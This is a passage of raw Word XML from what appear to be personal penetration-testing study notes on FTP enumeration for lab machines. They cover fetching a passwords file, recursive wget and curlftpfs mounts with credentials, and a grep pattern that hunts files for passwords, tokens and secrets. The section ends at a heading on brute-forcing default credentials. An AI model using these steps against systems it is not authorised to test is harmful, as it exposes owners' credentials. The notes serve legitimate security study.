      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I really recommend using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since there may be hidden files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get files from ftp (it will download to the current working directory):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="468"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">get passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013AF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download all files from the current directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd &lt;directory_path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">prompt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="388"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, FTP prompts you to confirm each file download when using mget. To avoid this and download all files without confirmation, disable prompting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mget *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (make sure you type in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">prompt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">before hand)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="388"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the mget command with a wildcard (*) to download all files in the current directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download all files recursively using wget (so no need to use ftp fool)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1271"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget -r ftp://USER:PASS@IP:PORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1271"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Be cognizant of fact that this will only get files we have Read access to, so it is important to manually login and explore the files for items that were missed. This may end up being a secondary enumeration pass, if we hit a wall — just don't forget it. I have found useful usernames in UAC files that I could not retrieve. It is also important to login to test file upload functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013BB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rinE '(password|username|user|pass|key|token|secret|admin|login|credentials)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command is really useful for looking through something like a directory of FTP or SMB files for useful information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Found in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId372">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3BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in the XXXXXXXXX exam for MS01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r : Recursive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i : Ignore case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n : Line numbers: Shows the line number in the file where the match occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-E : Use Extended Regular Expressions (ERE), which allows more powerful regex patterns like | (alternation/or), +, {}, etc., without needing to escape them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013C4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zby2ogfu67wy" w:id="166"/>
      <w:bookmarkEnd w:id="166"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to mount FTP Server</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, like with SMB, there are just way too many files and directories. So, we can just mount the FTP server to local Kali for easier enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="741"/>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13CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install curlftpfs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="770"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir ~/ftp-mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="770"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure it's empty if you already made it before</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="770"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curlftpfs ftp://user:password@host ~/ftp-mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="770"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This mounts the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ENTIRE </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP to ~/ftp-mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="770"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BE CAREFUL! curlftps has caused my computer to crash multiple times, including in XXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="770"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As I seen in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Netmon HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, sometimes when I mount it misses out on certain file (in this case, configuration files) that I have to go back to look at in the FTP manually. Probably has to do with permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="770"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curlftpfs ftp://user:pass@ftp.example.com/pub/data ~/ftp_mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="770"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This mount </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specific directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (/pub/data) to Kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget -m -nv --ftp-user=anonymous --ftp-password=anonymous ftp://10.10.10.152/"Programdata/Paessler/PRTG Network Monitor"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qx59wzt5px83" w:id="167"/>
      <w:bookmarkEnd w:id="167"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce default creds (without any previous info)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2781300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="338" name="image334.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image334.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId373"/>
